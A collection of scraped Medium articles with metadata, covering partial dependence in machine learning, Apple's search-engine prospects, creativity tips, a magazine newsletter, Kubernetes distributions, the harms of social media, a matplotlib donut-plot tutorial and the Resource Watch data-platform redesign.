But that’s besides the point): Dataset A: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 100 | | 0 | 1 | 0 | a | 98 | | 1 | 1 | 1 | a | 105 | | 1 | 0 | 0 | a | 97 | | 0 | 0 | 0 | a | 95 | | 1 | 0 | 1 | a | 102.9 | +------+------+------+----+-------+ Dataset B: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | b | 90 | | 0 | 1 | 0 | b | 99 | | 1 | 1 | 1 | b | 105 | | 1 | 0 | 0 | b | 97 | | 0 | 0 | 0 | b | 96 | | 1 | 0 | 1 | b | 102 | +------+------+------+----+-------+ Dataset C: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | c | 90 | | 0 | 1 | 0 | c | 105 | | 1 | 1 | 1 | c | 100 | | 1 | 0 | 0 | c | 97.1 | | 0 | 0 | 0 | c | 96.5 | | 1 | 0 | 1 | c | 102.1 | +------+------+------+----+-------+ Now we can take the average of the dependent values to get a reasonably close estimate for the average test time of vehicles with a specific ‘X5’. This method, like any other, has its own disadvantages: For starters, it’s only as good as our model. Therefore, if our model’s not very accurate, the results we get aren’t very reliable and might even be worse than taking the average of the original y-values. Another issue that arises with the use of partial dependence is that not all categories are compatible. For instance, let’s go back to the example of ‘X5’ and how its value can correspond to the level of climate consciousness of the owner. And we’ll also add a made-up column, called ‘X1000’, that includes 26 categories (‘a’, ‘b’, …, ‘z’) , relating to the type of AC used in a car. Now, assume ‘a’ is a type of AC which is cheap but comes at the expense of being inefficient relative to the amount of gas used and therefore damaging to the climate. But on the other end of the alphabet, we have ‘z’, a costly but climate-smart option for customers feeling guilty about themselves and their carbon footprint. In that case, if someone chooses ‘X5’ = ‘ag’ (which, remember, is the fuel-efficient type of tire), they’re most likely not going to choose ‘a’ as their AC because why order a cheeseburger combo with a diet Coke? However, for every data point in our dataset, partial dependence pairs all classes in ‘X5’ with it, even if the new rows are erroneous. This issue can be illustrated as follows: Original: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | ag | y | | 1 | 1 | 1 | ag | z | | 1 | 0 | 0 | aa | a | | 0 | 0 | 0 | aa | b | +------+------+------+----+-------+ Partial dependence for 'X5' = 'aa' +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | aa | y | | 1 | 1 | 1 | aa | z | | 1 | 0 | 0 | aa | a | | 0 | 0 | 0 | aa | b | +------+------+------+----+-------+ Partial dependence for 'X5' = 'ag' +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | ag | y | | 1 | 1 | 1 | ag | z | | 1 | 0 | 0 | ag | a | | 0 | 0 | 0 | ag | b | +------+------+------+----+-------+ Please note that, in the first example, climate-smart ‘X5’ options (‘ag’) go with climate-smart ‘X1000’ options (‘y’ and ‘z’) and carbon-emitting ‘X5’ options (‘aa’) go with carbon-emitting ‘X1000’ options (‘a’ and ‘b’), as is expected from customers with different views on climate-related issues. 
But in the second and third examples, climate-smart ‘X5’ options go with carbon-emitting ‘X1000’ options and carbon-emitting ‘X5’ options go with climate-smart ‘X1000’ options, which is the opposite of what is expected from (both green and non-green) customers. This could potentially be a problem because: Our model can’t make accurate predictions for rows which aren’t from the same distribution as our training set or Even if our model is nearly perfect when it comes to generalization, some rows might not even make theoretical sense and hence, we shouldn’t include them when doing partial dependence. Such an example would be a car made in the 1800s equipped with a turbocharger, etc. And lastly, perhaps partial dependence’s biggest problem in real-world machine learning is the amount of time it could take. For a dataset with a couple hundred thousand rows and a few hundred features with high cardinalities, performing partial dependence would be infeasible, especially if our model takes long for inference. A typical workaround is using only a small subset of the rows we’re given or doing partial dependence only for the features we really care about (the former shouldn’t change the results drastically as long as our mini-dataset is representative of the actual one). Despite all its imperfections, however, partial dependence is still an extremely powerful tool which enables you to gain insights into your dataset which traditional EDA methods simply can’t and these insights could then be turned into better business decisions which could maximize profit and impact. There are numerous such examples, and here we’ll go through one together. Bulldozer Auction A while ago, I wrote a series about a Kaggle competition where the goal was to successfully predict the auction price of a bulldozer given various features such as its size, the ID of the auctioneer, and a lot more, with most being technical terms not everyone (including me) understands. In one of the later articles, we realized the column containing the year the bulldozers were made (‘YearMade’) is very important to our model’s performance, which is probably no surprise to bulldozer professionals. However, we didn’t know how ‘YearMade’ affects the sale prices of the heavy equipment: Do they increase monotonically? Maybe plotting ‘YearMade’ against the dependent variable be all over the place? Or perhaps as ‘YearMade’ increases the sale price decreases? Logically, the first scenario should be the case but we need a way to prove that. You can probably see where this is going… The first thing that jumps to mind is taking the average of all sale prices for all years and seeing what that gives us. If our hypothesis is indeed true, we should get an increasing line/curve, right? But it turns out if we do that, there’d be a dip around ‘YearMade’ = 2000, which would mean bulldozers made in the early 1990s sell for more than the ones made in the late 1990s, contrary to our speculation. Picture from the ‘Introduction to Machine Learning for Coders’ course The organizers of the auctions might then decide since bulldozers made in the late 1990s sell for less than the ones made in the early 1990s, the former isn’t worth their time so they’ll stop auctioning it. By now, you should be suspicious of conclusions drawn by taking averages and resort to using partial dependence instead. If you do so for this bulldozer dataset, the result will be very different from the above graph and confirm our initial hypothesis. 
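Before looking at the corrected plot, here is a minimal sketch of the partial-dependence procedure described earlier for a single categorical feature, assuming a fitted scikit-learn-style model and a pandas DataFrame with the hypothetical column names from the example; in practice you would run it on a representative subset of rows to keep it fast.

import pandas as pd

def partial_dependence_categorical(model, X, feature, categories=None):
    # Force `feature` to each category for every row (all other columns unchanged),
    # predict with the model, and average: the 'all other things being equal' idea.
    categories = X[feature].unique() if categories is None else categories
    averages = {}
    for cat in categories:
        X_modified = X.copy()
        X_modified[feature] = cat          # e.g. set 'X5' to 'a' for every row
        averages[cat] = model.predict(X_modified).mean()
    return pd.Series(averages, name='avg_prediction')

# Usage sketch: rf is the Random Forest from part 2, X_sample a representative subset.
# pdp_x5 = partial_dependence_categorical(rf, X_sample, 'X5')
# print(pdp_x5.sort_values())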
Picture from the ‘Introduction to Machine Learning for Coders’ course Please note that the yellowish line is what we should be looking at (just ignore the blue ones for now) and the y-axis is the log of the dependent variable. As we can see, ‘YearMade’ and the y-axis have an almost linear relationship which means in reality, sale prices grow exponentially with respect to the year our bulldozers were made. There are a few possible explanations for the inconstistency between the two plots: Recession, difference between the quality of the bulldozers made during various time intervals, etc. Whichever the case, however, we can be certain if two bulldozers are identical in all ways but the year they were made, the older one will have a lower sale price. But if the auction organizers make their decisions based on the initial plot, they wouldn’t know that and would lose big sums of money by not auctioning heavy equipment made in certain years. Conclusion In this part, we saw how partial dependence works behind the scenes and frankly, it’s not very complicated: In order to calculate the true average of the dependent value for a category c (or a continuous value) in a feature F, it sets F to c for all rows in our dataset (or a subset of it, if it’s too big) and uses a predictive model to figure the dependent values for these modified rows. It then takes the averages of the predictions made by our model and that’s basically what we’re looking for (there are a few other steps involved but that’s the general idea). Admittedly, partial dependence does come with its own particular challenges, the major ones being the issue of some categories not being compatible with each other (a car made in the 1800s with autopilot) and the fact that it can be time- and resource- consuming sometimes. Nevertheless, it’s still a great tool to have in your toolbox and can aid you in making business decisions and drawing meaningful insights from your dataset. In the next part, we’ll look at how to implement partial dependence in Python using a powerful library called PDPBox, which comes with beautiful visualizations and several other useful related tools. To be continued… Please, if you have any questions or feedback at all, feel welcome to post them in the comments below and as always, thank you for reading! Part 1: https://medium.com/python-in-plain-english/mercedes-benz-greener-manufacturing-part-1-basic-data-pre-processing-a32d17803064 Part 2: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-3ddff72d0187 Part 3: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-1ca6b030bf58 Part 3 (continued): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-b5220f479a44 Part 3 (continued): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-a004659e02c4 Part 4: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-82dd27e53757 Part 5: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-e31198ecafae Part 5 (final part): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-ecbd2714d952 Twitter: https://twitter.com/bobmcdear GitHub: https://github.com/bobmcdear
https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-7b203e886f8d
['Borna Ahmadzadeh']
2020-12-27 18:10:47.421000+00:00
['Machine Learning', 'Artificial Intelligence', 'AI', 'Data Science', 'Data Visualization']
How Apple Can Make Money Through a Search Engine
OPINION How Apple Can Make Money Through a Search Engine How Apple can make up for losing $12 billion Created with Canva Design Congress wants to break up Google, claiming it has illegally thrashed the competition in the search engine market. Google dominates the market with an 86.86% share as of July 2020. The argument is that Google pays billions of dollars to other companies to become the default search engine for their consumers. In 2019, Google paid $30bn in “traffic acquisition costs”, almost a third of its entire search revenue. This was up from $26.7bn the previous year, and up from just $6.2bn a decade earlier. Google reportedly paid $12 billion to Apple to make Google the default search engine in Safari on iPhones. This means that if Google is regulated, Apple could lose around $12 billion each year, which amounts to a fifth of all its services revenue. Apple depends on Google, and those ties could be cut at any time. As an alternative, Apple is rumored to be working on its own search engine, Apple Search. So, how does Apple plan to monetize it and make up for the $12 billion?
https://medium.com/datadriveninvestor/how-apple-can-make-money-through-a-search-engine-12e018a58154
['Shubh Patni']
2020-11-14 14:06:37.266000+00:00
['Technology', 'Google', 'Apple', 'Innovation', 'Business']
How to Unleash Your Creativity in 30 Minutes a Day
Give some of the following methods a shot for 30 minutes each day to release your creativity: Nostalgia to the rescue! Harken back to your childhood. Did you have an active imagination? When I was in 3rd grade my teacher, Mrs. Bermudez gave myself and two friends all the extra worksheets she had left over from the year. We took possibly three bags of school work home. I set out to be a teacher. I arranged my teddy bears and dolls, made desks of cardboard boxes, and set out to teach. I did the assignments (since teddy bears cannot write), and pretended to grade their work. The interesting fact? I am a teacher who works with men and women educating them on domestic violence and anger management. Who knew a creative side would turn into a real life career move? Maybe you pretended you were a teacher or a doctor. Or, you thought you were a grand hero, like Spider-man or a famous hunter, playing in the woods. Perhaps you played as if you were the greatest skateboarder or a champion football player. Borrowing different personas is a fun way to show your creativity. Right now, imagine yourself as a successful and talented worker at your current profession. What would you wear? What about behaviors, your style, or your hairdo? What would you communicate to others or to the media? How would you relate? Visualize that you’re the greatest at something you enjoy doing for at least 10 minutes each day. If you can see it, you can achieve it. What are you good at? Imagination is powerful. As you develop the skills of creativity, you’ll find the ability to focus on what you excel at and what you’ve accomplished. Do you have specific skills or talents which you thrive in discussing? For the next 10, 20, or 30 minutes, consider your various skills, talents, and knowledge base. After your mind has toyed with the ideas, pick one skill to focus upon with intention. What makes you shine with particular ability you chose? Are you focused and follow instructions well? What about listening skills or speaking skills? If you noticed what others say, or feel when they share their thoughts, you can write about the way you are impacted. You quickly pick up on what’s expected of you. Consider if you find yourself internally motivated to accomplish jobs in a timely manner, or you can find ways to improve work performance. Take some time to write out how you create time saving documents or lists. When you know what you excel at, you feel confident. And when you’re confident, you’re not afraid to try new things and experiment (which are aspects of being creative). Let your mind fantasize about anything amazing in your life. My brother used to dream about buying an expansive house on the hill in Washington State. He’d tell me what he would do and how he’d have a room just for model making. Maybe, you’ll thrive with dreaming about a love relationship. Give yourself 30 minutes to sit back and dream. Imagine what the inside of the house looks like. Consider where you’d have a craft room, or even a holiday feast. Picture the face of a potential mate. Imagine what your first encounter would be and what you will wear to meet them. Create and laminate an index card for your pocket. On the index card, write your top 3 life goals. Keep the card in an easy place to take out and look at when you have a few minutes. The concept here is to remind yourself of the goals and dreams you have. Your future self needs to be reminded in the present of what you love, long for, and plan to accomplish. Ponder how you want to achieve the goals. 
Savor the victory. Cherish the wish. And visualize yourself arriving with accolades of honor. Remember, you hold the creative power to pursue every goal. You decide the process. Let your mind run free. Consider the following questions: what can you do today, tomorrow, next week, and next month to go after your goals? What mini steps can you take today to get you headed toward tomorrow's success? Take massive action to head toward your dreams.

Role models help us grow. Identify someone you admire or hold in high regard. I enjoy the research involved in studying famous psychologists, neurologists, or criminal forensic scientists. The ideas they present inspire my work with the justice system helping prevent violence. As I consider their history, their success, and their focus, I become inspired to keep pursuing my own dreams. Ask yourself, what is it about them you like? How would your life improve if you acted or believed as they do? Sometimes the personality or the traits we see in others make us feel happy or content. If we were to act as if we had the same trait, we'd begin to demonstrate the same behaviors. Usually, if you are around someone for 10 minutes a day, you'll start acting like that person. Be mindful who you study! For the next month, emulate the characteristic you admire. Maybe Joe gets to work on time, has a positive attitude, and tackles the job without criticizing the managers or leaders. As you notice the different characteristics of Joe, you may start to emulate him by ceasing negative self-talk about the leadership team, even if you feel justified. Find a way to look at the good around you and share what you see. Trying on new personal characteristics allows you to stretch yourself creatively to see what you can do.

Try something new. Experiment with a new creative activity. Explore arts and craft stores: buy a block of clay, a jewelry-making kit, or some paints and canvases. Look on Pinterest for do-it-yourself project ideas. Find a way to incorporate the artistic side into your schedule once a week. As we cultivate creativity, we build an artistic side we may not have realized we had in the past. One of the benefits of setting a time limit (30 minutes) on the project is that you do not have to complete it all in one sitting. It's possible you'll go past the half-hour mark; however, it's the creativity you are looking for, not necessarily the time. Your skills will expand, and your time away from work activities becomes an event you look forward to. Art or creative craft classes at local stores may be perfect to get you interested. Sometimes they are classes you take once and then move on; at other times they run once a day for several weeks. Start with what feels comfortable for you. As you build creativity in your life, you'll begin to feel the imagination take off. Working with your hands and mind together opens up new avenues.

Release the innovator inside. Delve into 30 minutes of pure invention-focused growth. When you focus your energy on any of the above strategies, or connect 2 or 3 of them together, you'll find yourself developing a new set of coping strategies, reducing stress, building resourcefulness, and connecting with the younger version of you. Believe in yourself. You are a creative individual. As you feel more confident, you'll prove you have talent. Take the time to do something which cultivates your imagination and originality, either daily or weekly.
As I consider my own artistic side, I realize I have let it slide too much and need to return to my first love: the arts. Maybe, after you read the above article, you too will want to delve in and explore a side of you not yet found, or one which lies dormant under the surface of hustle and bustle. I encourage you to step up and find the artist inside! ~Just a thought by Pamela
https://medium.com/change-your-mind/how-to-unleash-your-creativity-in-30-minutes-a-day-44160ec32737
['Pamela J. Nikodem']
2020-11-21 11:02:37.873000+00:00
['Self', 'Mental Health', 'Growth', 'Creativity', 'Art']
You had a lot to say this week
I love when I can read someone else’s work and feel the energy of the piece. It’s like the words are lightning bolts that leap off the page and charge my mind. That feeling happened a lot this week and our writers are to thank. They delivered moving monologues on love, fear, absence and guilt. Here’s what you missed: I also jumped in the mix this week with a piece titled Chaos and Creativity. It’s a short think piece on our ability to create through strained conditions. We already have more stories coming in so next week promises to be equally as inspiring. Keep submitting. We’re staying open to submissions over the holidays so if you feel like you have something to say, say it. We’ll publish it.
https://medium.com/cry-mag/you-had-a-lot-to-say-this-week-a6246e939852
['Kern Carter']
2020-12-12 12:46:45.529000+00:00
['Newsletter', 'Fear', 'Creativity', 'Love', 'Writing']
Kubernetes Distributions — What Are They?
Kubernetes Distributions — What Are They? Learn what they are and why they matter to you Photo by Drew Beamer on Unsplash One of the biggest announcements from the latest AWS re:Invent 2020 sessions was the release of EKS-D from Amazon. EKS-D is their open-source Kubernetes distribution that's now available for everyone to start using in their cloud provider or even on premises. It's based on past findings and the entire process Amazon has undergone in managing their managed Kubernetes platform, Amazon EKS. These announcements have many people asking themselves: “OK, I know Kubernetes, but what's a Kubernetes distribution? And why should I care?” So I'll try to answer that with the knowledge I have, and I always try to use the same approach: a Kubernetes versus Linux model comparison. Kubernetes is an open-source project, as you know, started by Google and now being managed by the community and the Cloud Native Computing Foundation (CNCF), and you can find all the code available here: But let's be honest: not many of us are pulling that repo and trying to compile it to provide a cluster. That's not how we usually work. If you follow the code path — downloading it, building it, and so on — this is usually called vanilla Kubernetes. If we start with the Linux comparison, it's the same situation we have with the Linux kernel that most Linux distributions ship: the kernel is already compiled and available, along with a bunch of other tools, all working together out of the box. So that's what a Kubernetes distribution is. They build Kubernetes. They provide other tools and components to enhance it or provide more features, and to focus on additional aspects such as security, DevOps, or something else. Another concept that usually comes up is the purity of a distribution, that is, whether a distribution is pure. We call a distribution pure when it builds Kubernetes, and that's it. It leaves everything else to the developers or users to decide what they want to use on top of it.
https://medium.com/better-programming/kubernetes-distributions-what-are-they-be2c438c8706
['Alex Vazquez']
2020-12-28 16:38:12.254000+00:00
['Software Development', 'AWS', 'Kubernetes', 'Containers', 'Programming']
Don’t Sell Your Emotions on Social Media
Before reading this article, I would like you to take some time and think about the changes in your social and professional behavior since you started using social media. Have you got anything? No? Don't worry. Take a long breath and start reading.

“THE TECHNOLOGY THAT CONNECTS US, ALSO CONTROLS US.” — Social Dilemma

Social media isn't a tool that's just waiting to be used. It has its own goals and its own means of pursuing them. There are 3.81 billion social media users in the world, a number growing by 9.2% every year. Have you ever wondered why there is so much user engagement on these social platforms? Everyone is fascinated by social media features. They make users feel involved: they help you stay in touch with what your friends are doing, stay up to date with news and current events, network with people, find funny and entertaining content, share photos and videos with others, share your opinion on any current issue, and much more.

But what if I told you that you are nothing but a product for social media to sell? Now you might ask how I can claim that we are the product. The simple answer is data. Whether you are aware of it or not, the AI techniques integrated into these social media platforms monitor your smallest actions: how long you engage with a particular post, the types of posts you like, share, or comment on, your reactions to the posts your friends like or share, what's trending in your area according to your GPS location, and the kinds of accounts you search for or follow. Collecting all this data, the media giants understand your interests, likes, dislikes, perceptions, motives, nature, and, most importantly, your emotions. If I had to summarize what I have stated so far, I would say, “YOU ARE TRAPPED!!”

Photo by Artyom Kim on Unsplash

I think you now have a glimpse of the objective of this article. Let's divide it into two parts: first, why I said you are a product to sell, and second, why I exclaimed that you are trapped.

The complex algorithms designed by the experts at the social media giants work entirely on the data you provide through your clicks and post engagements. Consider a situation where you like animal posts ten or twelve times in a row; a human will easily figure out that you are fond of animals, but what about a machine? It analyzes the data, understands your behavior, finds the patterns, and tests what it has learned against your emotions. That's how they build predictive models, forecast outcomes, and constantly update themselves with new data.

Now just imagine I am running a company that manufactures gym equipment and sells it in the market. I want help from social media, so I sponsor an ad, say on Instagram, for a certain fee, hoping for high customer engagement. Suppose you live near my company's location and you are a fitness freak, which Instagram knows. Then of course you will get the ad in your Instagram feed, and it will nudge you to buy the equipment. If you happen to be looking for some cool gear and you like the products in the ad, you are likely to purchase them, and obviously I will say I got a new customer. “That's great! How cool is social media!” Again, you might ask me what's wrong with this deal; after all, I got what I wanted.
The product matched my interests, so it's good that I purchased it. But when you think about it more deeply, you will understand that social media sold you, because you are the perfect customer for that type of product. Instagram knows how many fitness posts you have liked, that you follow fitness influencers, that you share fitness posts, and much more. That's where your interests play a vital role. They are utilizing your data to make the best possible recommendations, and in return you can't stop yourself from purchasing. The same predictive modeling is used to maintain your social media feeds, where you get video recommendations, post referrals, or product ads based on your interests. Indirectly, they push you to get involved, to spend more time scrolling through posts, and to buy items, which in turn makes huge revenue for them. The recommendation engines are capable of keeping track of your every action and updating the suggestions continuously, so that you can't detach yourself. You repeatedly scroll your feed and keep the flow going. Whenever we search for a product on an e-commerce site, after viewing two or three items we get ads for the same product in our social media feeds, our email, and so on. They are playing with your mindset: they push notifications at regular intervals so that their ultimate goal of keeping you involved is achieved, and eventually you get manipulated into purchasing that product.

Coming back to my second exclamation: you are trapped!! An excess of anything is harmful; if you can't feel it now, you will surely experience it in the future. I would like to share some social media facts which will disturb you for sure.

Photo by Sydney Sims on Unsplash

- 95% of teens who use social media have witnessed cruel behavior on social networking sites.
- In the world, 80% of teens use Facebook, and 54% of those experienced cyberbullying.
- 9X higher chances of identity fraud.
- Engaging in dangerous and harmful activities, including reckless behavior, substance abuse, or self-injury.
- Higher risk of depression, trouble sleeping, ongoing sadness, and losing interest in favorite activities.
- Sharing of inappropriate content/misinformation distribution.
- Relationship threats, abuse, intimidation, faking perfection, social comparison, and self-esteem increase.
- 140–150 minutes of daily time spent on social networking sites worldwide; 39,757 years collectively spent per day on FACEBOOK.
- 25% of users have admitted to being distracted during intimacy; 14% have risked their own safety.
- According to MIT research, fake news spread 6 times faster than real news on Twitter.
- 62% of the population worldwide confesses to believing fake news.
- 89% of Americans believe that social media is responsible for spreading misinformation.
- 29% of the population deleted/removed social media accounts because they felt overloaded by it.
- The Prime Minister of India, Narendra Modi, has 60% fake followers on Twitter, while US President Donald Trump has 37% and Congress Party member Rahul Gandhi has 69% fake followers on Twitter.
- Social media use in India has risen from 137 million to over 600 million users in 2019, which leads to fake news distribution (230 million WhatsApp users, the highest in any country).
- There are only two industries that call their customers ‘USERS': ILLEGAL DRUGS & SOFTWARE.

Now, after reading all these facts, just ask yourself whether you are using these social media platforms effectively or creating problems for yourself. If we think about fake news distribution, we can't trust anyone who claims to be sharing real news. If we think about social comparison, we can't decide whether another person's guidance will be beneficial for us or not. If we think about relationships, we never know when we will get disheartened, and that can lead to depression and anxiety. Social media is an unauthorized spy that knows everything about you: your interests, mental condition, weekly plans, location, birthday, relationships, health, habits, next food order, visits, mentors, successes, failures, and many more things that even you don't know about yourself.

“Social media is training us to compare our lives, instead of appreciating everything we are. No wonder why everyone is always depressed.” — Bill Murray

Sharing our data is our responsibility: what to share, when to share, how to share, why to share, and with whom to share will all shape your future actions.

Photo by Ross Findon on Unsplash

In the end, I ask you: it's a social life, please don't make it so personal. Don't post your feelings. Don't share your emotions. This is not the kind of world where you can expect genuine advice from others; no, don't expect that from social media. There are so many people who will judge you based on your post engagements and form perceptions about you, but you just want to trick them. Enjoy your weekend fully social-media free, spend time with your loved ones, and invest time in your favorite activities. Finally, I suggest you think about your current situation and work on your mindset so you can use these social media platforms more effectively, in a way that helps your growth. Don't use social media to impress people; utilize it to impact people. I hope this article brings a valuable change to your social and personal life. Thanks for reading. Now it's up to you; choose wisely.
https://medium.com/plus-marketing/dont-sell-your-emotions-on-social-media-6079735e2dc6
['Amey Band']
2020-11-20 13:26:12.067000+00:00
['AI', 'Social Media', 'Emotional Intelligence', 'Instagram', 'Facebook']
Donut Plot with Matplotlib (Python)
Donut Plot with Matplotlib (Python)

Let's start by praising visualizations with a very famous English-language adage. It's cliché but dead on.

“A picture is worth a thousand words”

In this post, I'll demonstrate how to create a donut plot using matplotlib with Python. A donut plot is a very efficient way of comparing stats for multiple entities. As per [1]:

Just like a pie chart, a doughnut chart shows the relationship of parts to a whole, but a doughnut chart can contain more than one data series. Each data series that you plot in a doughnut chart adds a ring to the chart.

Now let's use the following dummy data representing the usage of mobile applications of different social media websites.

╔═════════════════╦══════════╗
║ Social Media    ║  Usage   ║
╠═════════════════╬══════════╣
║ Twitter         ║  60 %    ║
║ Facebook        ║  75 %    ║
║ Instagram       ║  80 %    ║
╚═════════════════╩══════════╝

Following is the code for creating a donut plot. (The CSV file is assumed to contain a 'scenario' column with the platform names and a 'Percentage' column with the usage strings from the table above.)

import re

import pandas as pd
import matplotlib.pyplot as plt

# load the dummy data: one row per social media platform
data = pd.read_csv('testdata.csv')
print(data.head())

# create donut plots: draw one pie per row, each with a smaller radius than the last
startingRadius = 0.7 + (0.3 * (len(data) - 1))
for index, row in data.iterrows():
    scenario = row["scenario"]
    percentage = row["Percentage"]
    textLabel = scenario + ' ' + percentage
    print(startingRadius)

    # extract the numeric part of the percentage string (e.g. '60 %' -> 60)
    percentage = int(re.search(r'\d+', percentage).group())
    remainingPie = 100 - percentage

    donut_sizes = [remainingPie, percentage]

    plt.text(0.01, startingRadius + 0.07, textLabel,
             horizontalalignment='center', verticalalignment='center')
    plt.pie(donut_sizes, radius=startingRadius, startangle=90,
            colors=['#d5f6da', '#5cdb6f'],
            wedgeprops={"edgecolor": "white", 'linewidth': 1})

    startingRadius -= 0.3

# equal ensures pie chart is drawn as a circle (equal aspect ratio)
plt.axis('equal')

# create circle and place onto pie chart to punch out the donut hole
circle = plt.Circle(xy=(0, 0), radius=0.35, facecolor='white')
plt.gca().add_artist(circle)

plt.savefig('donutPlot.jpg')
plt.show()

Donut Plot

At its core, the donut plot in this code is created by drawing a series of pie charts of different radiuses, one on top of the other, with a white circle in the center.

References

[1] https://support.office.com/en-us/article/present-your-data-in-a-doughnut-chart-0ac0efde-34e2-4dc6-9b7f-ac93d1783353
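A quick footnote on the design choice above (not part of the original walkthrough, just an alternative worth knowing): recent Matplotlib versions can draw each ring directly by giving the wedges a width, which avoids stacking full pies and covering the middle with a white circle. Here is a minimal sketch of that approach, hard-coding the dummy values from the table instead of reading the CSV:

import matplotlib.pyplot as plt

# dummy values from the table above; each platform gets its own ring
platforms = ['Twitter', 'Facebook', 'Instagram']
usage = [60, 75, 80]

radius = 1.3
for name, pct in zip(platforms, usage):
    plt.pie([100 - pct, pct],
            radius=radius,
            startangle=90,
            colors=['#d5f6da', '#5cdb6f'],
            # a wedge width smaller than the radius turns the pie into a ring,
            # so no white cover-up circle is needed
            wedgeprops={'width': 0.3, 'edgecolor': 'white', 'linewidth': 1})
    plt.text(0, radius - 0.15, name + ' ' + str(pct) + ' %',
             horizontalalignment='center', verticalalignment='center')
    radius -= 0.3

plt.axis('equal')
plt.show()

Both versions produce the same kind of concentric-ring chart; the wedge-width variant simply trades the cover-up circle for a per-ring width.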
https://towardsdatascience.com/donut-plot-with-matplotlib-python-be3451f22704
['Asad Mahmood']
2019-06-12 22:17:54.482000+00:00
['Data Sceince', 'Matplotlib', 'Python', 'Data Visualization']
How we made Resource Watch even easier to use.
Design and user research go hand in hand when it comes to product development. Both are essential if you want to make a product that is useful, usable, and used. We’ve been working with the Resource Watch team at World Resources Institute (WRI) on a redesign that makes planetary data easier to use. I spoke with Dani Caso (Designer) and Martin Dubuisson (User Researcher) to find out more. So, why did Resource Watch get a redesign? Dani: User research done by Martin revealed several things that we could improve in terms of the user experience on Resource Watch. Rather than taking each problem one by one and finding isolated solutions, we decided it made more sense to reconfigure the whole space. Martin: The Explore page — a sort of library of open-source global datasets that can be accessed and visualized on a map — is really the core offering of Resource Watch. Over the years the page has hosted a growing number of datasets on a vast array of different topics. In our conversation with users, many had described the Explore page as “overwhelming”. Yes, they can search for datasets in the search bar, but some users weren’t sure which words they should type or which datasets are available. Our main challenge was to represent the breadth of the data, invite exploration, and inspire (which are key elements of the value proposition to our users). While at the same time providing users with quick access to the datasets they are searching for. In addition to that, we also took advantage of this redesign to tackle a number of other changes, based on needs detected from our previous testing. For example, these included making it easier for users to customise their experience, and removing misleading redirections. We made a conscious decision to work very closely with the Resource Watch team at WRI. We carried out some interviews together, and involved the whole team in a co-analysis session. We asked them to review some recordings of the user testing so that we could discuss them in-depth and cross-reference our interpretations. This was a fun exercise, and more importantly, it helped ensure that the key learnings about users wouldn’t simply end up in a one-directional presentation (and therefore probably quickly forgotten about). Instead, this approach meant that our user insights were built and absorbed by everyone on the team. Members of WRI’s Resource Watch team came to our Madrid office for a co-analysis session where we discussed the findings of the user research in more detail. What information did you use to develop the new design for Resource Watch? Dani: Knowing who your users are and what they need is the first and most important piece of information you need when designing a data platform. Martin’s research told us that policymakers, journalists, and educators were the three key users of Resource Watch. The conversations with people from these three groups also told us that there’s a wide range of experience and knowledge level that we need to cater for. We needed a design that would make the Resource Watch data accessible and usable for all of them. Our goal was to provide the tools that someone needs to be a great analyst. If you’re not an expert on climate data, you’ll need some guidance. If you are a climate data expert, you’ll want the fastest entry point to the most relevant data. When I pitched this approach to WRI, I used the Pixar movie ‘Ratatouille’ as a reference. 
In that movie, a stuck-up food critic learns that anyone can become a great cook if you give them tools (or a good cook book!) to work with. Our aim is the same with Resource Watch. We’re giving every chef the tools they need to create delicious dishes of data. Martin: On most of our projects, we try to gather as much information as possible about a situation before making decisions. In this case, our main approach was to carry out user testing — showing the new designs to users, hearing their feedback, and analyzing their behavior and words. But we also had a look at quantitative sources too: we looked at Google Analytics (website analytics to get large scale statistics on user behavior), to know, for example, more about the keywords that users enter when doing a search on Resource Watch. Over the years, we’ve developed a more solid understanding of our users. So, we’ve been revisiting our conclusions from previous user testings, to make sure we build on previous blocks of knowledge and gain an increasingly accurate picture. How do you simplify things without losing information? Dani: You simplify things by having everything in order. That doesn’t mean you need to get rid of things. You simply reorganise what you have. It’s like tidying your house and choosing where to put things. You probably won’t throw anything away, but you will put things in places that make them easier to find when you need them. Martin: As a user researcher, it’s my role to find the barriers that block people from finding the information they want. Once we find them, Dani uses design to take them away. Something that our user research team has noticed over and over in many projects, is that most people don’t bother reading long texts — or even long paragraphs — for example those that describe the datasets. Now, this might not come as a big surprise to most of you, we’ve all heard that attention spans are getting shorter. But in most of our projects — where many of our users have scientific backgrounds — we had assumed that they would be keen on reading all the details. Truth is: many science-minded people skim read too, or they just want to go straight to the point. Which means, more often than not, just a few well-worded, well-placed bullet points will do! The design can always include a hyperlink or an additional information button to cater to those who will be keen on reading more. Dani: In the case of Resource Watch, we’ve added customised features that allow users to curate and save the data they regularly use. When we designed this, we took inspiration from playlists and pinterest boards that people use to gather the things they care about most. We also drew inspiration from Netflix and how they categorise movies and tv shows, to help us assemble groups of datasets that relate to one another. The challenge here was to turn an experience that’s often considered boring into something fun! Data doesn’t need to be boring. Information is interesting! So, if we make the digestion of data easier, and let people enjoy it, they will use it! Boring can be a barrier. Data should be understandable, accessible and beautiful. Beauty comes from being understandable and accessible. These are the principles we follow when thinking about design. Every sprint needs a silly moment to help creative ideas flow. What’s your favourite thing about the new Resource Watch? Dani: My favourite thing about the new Resource Watch is that we are opening up new possibilities. We’ve created a stronger foundation from which we can grow. 
